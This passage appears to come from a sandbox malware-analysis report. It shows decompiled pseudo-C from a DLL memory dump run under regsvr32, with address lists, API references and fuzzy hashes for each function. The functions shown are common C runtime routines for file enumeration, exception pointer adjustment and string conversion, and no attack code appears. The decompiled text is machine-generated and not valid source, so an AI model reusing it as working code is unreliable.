																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E6F84DC0E(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E6F851BC0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E6F84E9E5);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E6F84DC0E(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E6F849ADF(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E6F84DC0E(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E6F852170(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E6F84DC0E( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E6F84DC0E(_t283);
						goto L31;
					}
				} else {
					_t219 = E6F84D46D(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E6F84C24F();
					L31:
					return _t297;
				}
				L81:
			}

0x6f84eba0
0x6f84eba3
0x6f84eba6
0x6f84eba7
0x6f84eba9
0x6f84ebbf
0x6f84ebc3
0x6f84ebc6
0x6f84ebc8
0x6f84ebca
0x6f84ebcc
0x6f84ebce
0x6f84ebd1
0x6f84ebd4
0x6f84ebd7
0x6f84ebd9
0x6f84ec3c
0x6f84ec3e
0x6f84ec41
0x6f84ec43
0x6f84ec47
0x6f84ec50
0x6f84ec51
0x6f84ec54
0x6f84ec56
0x6f84ec59
0x6f84ec5d
0x6f84ec5d
0x6f84ec5f
0x6f84ec61
0x6f84ec63
0x6f84ec65
0x6f84ec65
0x6f84ec67
0x6f84ec6a
0x6f84ec6d
0x6f84ec6d
0x6f84ec6f
0x6f84ec70
0x6f84ec70
0x6f84ec7b
0x6f84ec7d
0x6f84ec80
0x6f84ec81
0x6f84ec84
0x6f84ec84
0x6f84ec88
0x6f84ec8b
0x6f84ec8e
0x6f84ec8e
0x6f84ec8e
0x6f84ec9b
0x6f84ec9d
0x6f84eca0
0x6f84eca2
0x6f84ecba
0x6f84ecbd
0x6f84ecc0
0x6f84ecc2
0x6f84ecc5
0x6f84ecc7
0x6f84ecca
0x6f84eccd
0x6f84ed2a
0x6f84ed2d
0x6f84ed30
0x6f84ed32
0x00000000
0x6f84eccf
0x6f84ecd1
0x6f84ecd1
0x6f84ecd3
0x6f84ecd6
0x6f84ecd6
0x6f84ecd8
0x6f84ecda
0x6f84ece0
0x6f84ece3
0x6f84ece3
0x6f84ece5
0x6f84ece6
0x6f84ece6
0x6f84eced
0x6f84ecf0
0x6f84ecf4
0x6f84ed01
0x6f84ed06
0x6f84ed09
0x6f84ed0b
0x6f84ed7f
0x6f84ed80
0x6f84ed81
0x6f84ed82
0x6f84ed83
0x6f84ed84
0x6f84ed89
0x6f84ed8d
0x6f84ed8f
0x6f84ed90
0x6f84ed93
0x6f84ed93
0x6f84ed96
0x6f84ed96
0x6f84ed98
0x6f84ed99
0x6f84ed99
0x6f84ed9d
0x6f84ed9e
0x6f84eda5
0x6f84eda8
0x6f84edab
0x6f84edad
0x6f84edb5
0x6f84edb6
0x6f84edb7
0x6f84edba
0x6f84edc4
0x6f84edc8
0x6f84edca
0x6f84edde
0x6f84edde
0x6f84ede1
0x6f84edeb
0x6f84edf0
0x6f84edf3
0x6f84edf5
0x00000000
0x6f84edf7
0x6f84edf7
0x6f84edfc
0x6f84ee03
0x6f84ee06
0x6f84ee08
0x6f84ee19
0x6f84ee1b
0x6f84ee1d
0x6f84ee1d
0x6f84ee1d
0x6f84ee0a
0x6f84ee0b
0x6f84ee10
0x6f84ee13
0x6f84ee22
0x6f84ee28
0x00000000
0x6f84ee2b
0x6f84edcc
0x6f84edcc
0x6f84edd2
0x6f84edd7
0x6f84edda
0x6f84eddc
0x6f84ee2e
0x6f84ee30
0x6f84ee31
0x6f84ee32
0x6f84ee33
0x6f84ee34
0x6f84ee35
0x6f84ee3a
0x6f84ee3d
0x6f84ee3e
0x6f84ee40
0x6f84ee46
0x6f84ee4d
0x6f84ee50
0x6f84ee53
0x6f84ee56
0x6f84ee57
0x6f84ee58
0x6f84ee5b
0x6f84ee61
0x6f84ee63
0x6f84ee65
0x6f84ee65
0x6f84ee67
0x6f84ee69
0x00000000
0x00000000
0x6f84ee6b
0x6f84ee6d
0x6f84ee6f
0x6f84ee71
0x6f84ee7c
0x6f84ee7e
0x6f84ee80
0x00000000
0x00000000
0x6f84ee80
0x6f84ee71
0x00000000
0x6f84ee6d
0x6f84ee82
0x6f84ee82
0x6f84ee88
0x6f84ee8a
0x6f84ee90
0x6f84ee92
0x6f84eeb4
0x6f84eeb4
0x6f84eeb6
0x6f84eeb8
0x6f84eec4
0x6f84eec4
0x6f84eeba
0x6f84eeba
0x6f84eebc
0x00000000
0x6f84eebe
0x6f84eebe
0x6f84eec0
0x6f84eec2
0x00000000
0x00000000
0x6f84eec2
0x6f84eebc
0x6f84eecc
0x6f84eed4
0x6f84eeda
0x6f84eedb
0x6f84eedd
0x6f84eee5
0x6f84eeeb
0x6f84eef1
0x6f84eef7
0x6f84ef0b
0x6f84ef10
0x6f84ef1b
0x6f84ef2b
0x6f84ef31
0x6f84ef33
0x6f84ef36
0x6f84ef59
0x6f84ef59
0x6f84ef5e
0x6f84ef64
0x6f84ef64
0x6f84ef6a
0x6f84ef70
0x6f84ef76
0x6f84ef7c
0x6f84ef82
0x6f84efa3
0x6f84efa8
0x6f84efad
0x6f84efb1
0x6f84efb7
0x6f84efba
0x6f84efcd
0x6f84efcd
0x6f84efd3
0x6f84efd9
0x6f84efda
0x6f84efdb
0x6f84efe0
0x6f84efe3
0x6f84efe9
0x6f84efeb
0x6f84f049
0x6f84f04f
0x6f84f057
0x6f84f05c
0x6f84f062
0x6f84f063
0x00000000
0x00000000
0x00000000
0x6f84efbc
0x6f84efbc
0x6f84efbf
0x6f84efc1
0x00000000
0x6f84efc3
0x6f84efc3
0x6f84efc6
0x00000000
0x6f84efc8
0x6f84efc8
0x6f84efcb
0x00000000
0x00000000
0x00000000
0x00000000
0x6f84efcb
0x6f84efc6
0x6f84efc1
0x6f84f065
0x6f84f066
0x00000000
0x6f84efed
0x6f84efed
0x6f84eff3
0x6f84effb
0x6f84f000
0x6f84f00f
0x6f84f00f
0x6f84f017
0x6f84f01d
0x6f84f023
0x6f84f02a
0x6f84f02d
0x6f84f02f
0x6f84f03f
0x6f84f044
0x00000000
0x6f84ef38
0x6f84ef38
0x6f84ef3e
0x6f84ef3f
0x6f84ef40
0x6f84ef41
0x6f84ef49
0x6f84ef49
0x6f84f06c
0x6f84f06c
0x6f84f073
0x6f84f074
0x6f84f07c
0x6f84f081
0x6f84f082
0x6f84ee94
0x6f84ee94
0x6f84ee97
0x6f84ee99
0x6f84eeae
0x00000000
0x6f84ee9b
0x6f84ee9b
0x6f84ee9e
0x6f84ee9f
0x6f84eea0
0x6f84eea1
0x6f84eea6
0x6f84ee99
0x6f84f087
0x6f84f088
0x6f84f08a
0x6f84f091
0x00000000
0x00000000
0x00000000
0x6f84eddc
0x6f84edaf
0x6f84edb1
0x6f84edb2
0x6f84edb4
0x6f84edb4
0x00000000
0x00000000
0x00000000
0x00000000
0x6f84ed0d
0x6f84ed0d
0x6f84ed13
0x6f84ed16
0x6f84ed19
0x6f84ed1c
0x6f84ed1f
0x6f84ed22
0x6f84ed25
0x6f84ed25
0x00000000
0x6f84ecd6
0x6f84eca4
0x6f84eca4
0x6f84eca7
0x6f84ed34
0x6f84ed35
0x6f84ed3a
0x00000000
0x6f84ed3a
0x6f84ebdb
0x6f84ebdb
0x6f84ebde
0x6f84ebe6
0x6f84ebe9
0x6f84ebf0
0x6f84ebf2
0x6f84ebf4
0x6f84ec0f
0x6f84ec10
0x6f84ec11
0x6f84ec12
0x6f84ec17
0x6f84ec1a
0x6f84ec1d
0x6f84ebf6
0x6f84ebf6
0x6f84ebf9
0x6f84ebfa
0x6f84ebfb
0x6f84ebfc
0x6f84ebfd
0x6f84ec02
0x6f84ec04
0x6f84ec07
0x6f84ec07
0x6f84ec1f
0x6f84ec21
0x00000000
0x00000000
0x6f84ec2a
0x6f84ec2d
0x6f84ec30
0x6f84ec32
0x6f84ec34
0x00000000
0x6f84ec36
0x6f84ec36
0x6f84ec39
0x00000000
0x6f84ec39
0x00000000
0x6f84ec34
0x6f84ecaf
0x6f84ed3b
0x6f84ed3e
0x6f84ed42
0x6f84ed4b
0x6f84ed4e
0x6f84ed52
0x6f84ed52
0x6f84ed54
0x6f84ed57
0x6f84ed59
0x6f84ed5b
0x6f84ed5d
0x6f84ed62
0x6f84ed63
0x6f84ed67
0x6f84ed67
0x6f84ed6b
0x6f84ed6e
0x6f84ed6e
0x6f84ed72
0x00000000
0x6f84ed79
0x6f84ebab
0x6f84ebab
0x6f84ebb2
0x6f84ebb3
0x6f84ebb5
0x6f84ed7a
0x6f84ed7e
0x6f84ed7e
0x00000000

APIs

_free.LIBCMT ref: 6F84ED35

Strings

*?, xrefs: 6F84EBDE

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 939c668b89eb78b1771427d9910a47cc5a2598c9164f03a6bbd27ebda0841c17
Instruction ID: ce80aed3a36301e9cf729f369e529116734edfc53bad36637121c0f37f0ed749
Opcode Fuzzy Hash: 939c668b89eb78b1771427d9910a47cc5a2598c9164f03a6bbd27ebda0841c17
Instruction Fuzzy Hash: F1611B75D0021DAFDB15CFACC8809EEFBF5EF48314B1485AAD855EB340E775AA418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F84AE74 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E6F84AE74(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6f85a770);
				E6F849960(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6F849DB0(_t107, E6F84AC5A(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6F849DB0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6f85d368; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6f8551b8();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6F84D547(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6f85a790);
									E6F849960(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6F84AE74(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6F84BB74(_t103, _t108[0x18], E6F84AC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6F84BB84(_t103, _t108[0x18], E6F84AC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6F84AC5A();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6f84ae74
0x6f84ae76
0x6f84ae7b
0x6f84ae80
0x6f84ae82
0x6f84ae85
0x6f84ae8a
0x6f84af9a
0x6f84af9a
0x6f84af9a
0x00000000
0x6f84ae99
0x6f84ae99
0x6f84ae9e
0x6f84aea8
0x6f84aeaa
0x6f84aeaf
0x6f84aeb4
0x6f84aeb4
0x6f84aeb6
0x6f84aeb9
0x6f84aebe
0x6f84aee0
0x6f84aee0
0x6f84aee3
0x6f84aee6
0x6f84af04
0x6f84af07
0x6f84af46
0x6f84af49
0x6f84af4c
0x6f84af71
0x6f84af73
0x00000000
0x6f84af75
0x6f84af75
0x6f84af77
0x00000000
0x6f84af79
0x6f84af79
0x6f84af7e
0x6f84af82
0x6f84af82
0x6f84af83
0x00000000
0x6f84af83
0x6f84af77
0x6f84af4e
0x6f84af4e
0x6f84af50
0x00000000
0x6f84af52
0x6f84af52
0x6f84af54
0x00000000
0x6f84af56
0x6f84af67
0x00000000
0x6f84af6c
0x6f84af54
0x6f84af50
0x6f84af09
0x6f84af09
0x6f84af0d
0x00000000
0x6f84af13
0x6f84af13
0x6f84af15
0x00000000
0x6f84af1b
0x6f84af22
0x6f84af2a
0x6f84af2e
0x6f84af30
0x6f84af33
0x6f84af38
0x6f84af39
0x00000000
0x6f84af39
0x6f84af33
0x00000000
0x6f84af2e
0x6f84af15
0x6f84af0d
0x6f84aee8
0x6f84aee8
0x00000000
0x6f84aee8
0x6f84aec5
0x6f84aec5
0x6f84aeca
0x6f84aecf
0x00000000
0x6f84aed1
0x6f84aed3
0x6f84aedc
0x6f84aeeb
0x6f84aeed
0x6f84afac
0x6f84afac
0x6f84afb1
0x6f84afb2
0x6f84afb4
0x6f84afb9
0x6f84afbe
0x6f84afc1
0x6f84afc4
0x6f84afc7
0x6f84afd0
0x6f84afd0
0x6f84afc9
0x6f84afc9
0x6f84afc9
0x6f84afd3
0x6f84afd7
0x6f84afda
0x6f84afdb
0x6f84afdc
0x6f84afdd
0x6f84afe0
0x6f84afe9
0x6f84afe9
0x6f84afec
0x6f84b022
0x6f84afee
0x6f84afee
0x6f84afee
0x6f84aff1
0x6f84b008
0x6f84b008
0x6f84aff1
0x6f84b027
0x6f84b031
0x6f84b03d
0x6f84aefb
0x6f84aefb
0x6f84af00
0x6f84af01
0x6f84af3b
0x6f84af42
0x6f84af86
0x6f84af86
0x6f84af8d
0x6f84af9c
0x6f84af9f
0x6f84afab
0x6f84afab
0x6f84aeed
0x6f84aecf
0x00000000
0x00000000
0x00000000
0x6f84ae9e

APIs

___AdjustPointer.LIBCMT ref: 6F84AF3B
___AdjustPointer.LIBCMT ref: 6F84AF5E
___AdjustPointer.LIBCMT ref: 6F84AFFA

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9860f5dcd618b7c2425c20db10d824ca8c9613cb352f3be2da5243dae549f9d9
Instruction ID: cfecd7e5fbd8aed3a688b55f3065a13c9929405280a0a97cb44e81a9964fa42f
Opcode Fuzzy Hash: 9860f5dcd618b7c2425c20db10d824ca8c9613cb352f3be2da5243dae549f9d9
Instruction Fuzzy Hash: 1D518CB260570EAFEB198F58C940BAAB7A5FF44314F104DBEE8255E2D0E731E891C790

Uniqueness

Uniqueness Score: -1.00%

Function 6F84EAAF Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F84EAAF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6F84FCA5(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6F84FCA5(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6F84D437(GetLastError());
									_t19 =  *((intOrPtr*)(E6F84D46D(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6F84F0EB(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6F84D437(GetLastError());
						return  *((intOrPtr*)(E6F84D46D(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6F84F0EB(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6F84F0D1(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x6f84eab6
0x6f84eabb
0x6f84ead9
0x6f84eadb
0x6f84eade
0x6f84eb0b
0x6f84eb13
0x6f84eb15
0x6f84eb2e
0x6f84eb31
0x6f84eb34
0x6f84eb42
0x6f84eb51
0x6f84eb59
0x6f84eb5b
0x6f84eb74
0x6f84eb77
0x6f84eb77
0x6f84eb5d
0x6f84eb64
0x6f84eb6f
0x6f84eb6f
0x6f84eb79
0x00000000
0x6f84eb79
0x6f84eb39
0x6f84eb3e
0x6f84eb40
0x00000000
0x00000000
0x00000000
0x6f84eb40
0x6f84eb1e
0x00000000
0x6f84eb29
0x6f84eae0
0x6f84eae3
0x6f84eae6
0x6f84eaf9
0x6f84eafc
0x6f84eacf
0x6f84eacf
0x00000000
0x6f84ead2
0x6f84eaec
0x6f84eaf1
0x6f84eaf3
0x6f84eb7d
0x6f84eb7d
0x00000000
0x6f84eaf3
0x6f84eabd
0x6f84eac2
0x6f84eac7
0x6f84eac9
0x6f84eacc
0x00000000

APIs

Part of subcall function 6F84F0D1: _free.LIBCMT ref: 6F84F0DF

Part of subcall function 6F84FCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6F84E286,6F8512A9,0000FDE9,00000000,?,?,?,6F851022,0000FDE9,00000000,?), ref: 6F84FD51

GetLastError.KERNEL32 ref: 6F84EB17
__dosmaperr.LIBCMT ref: 6F84EB1E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6F84EB5D
__dosmaperr.LIBCMT ref: 6F84EB64

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 5eff3fe3cdce836c4c1b059b5e975b55c8ef6872f1de88f75431d983273b5bbf
Instruction ID: d4cf3afde8c7f4fca5df4cb73e49596384e796fd48f37a7ba1d9c719aa034f74
Opcode Fuzzy Hash: 5eff3fe3cdce836c4c1b059b5e975b55c8ef6872f1de88f75431d983273b5bbf
Instruction Fuzzy Hash: 8121927160471DBFEB10CFA98880957B7A9EF113687008D99E866AF990D730FC5087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F84D9BC Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E6F84D9BC(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t12;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6f85c110; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F84DF59(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6F84DC48(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6F84DF59(__eflags,  *0x6f85c110, _t51);
							if(__eflags != 0) {
								E6F84D7BE(_t51, 0x6f85d850);
								E6F84DC0E(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6F84DF59(__eflags,  *0x6f85c110, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6F84DF59(0,  *0x6f85c110, 0);
							_push(0);
							L9:
							E6F84DC0E();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6F84DF1A(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6f85c110; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6F84D547(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6f85c110; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6F84DF59(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6F84DC48(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6F84DF59(__eflags,  *0x6f85c110, _t60);
								if(__eflags != 0) {
									E6F84D7BE(_t60, 0x6f85d850);
									E6F84DC0E(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6F84DF59(__eflags,  *0x6f85c110, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6F84DF59(__eflags,  *0x6f85c110, _t20);
								_push(_t60);
								L25:
								E6F84DC0E();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6F84DF1A(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6f85c110; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6F84D547(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6f85c110; // 0x7
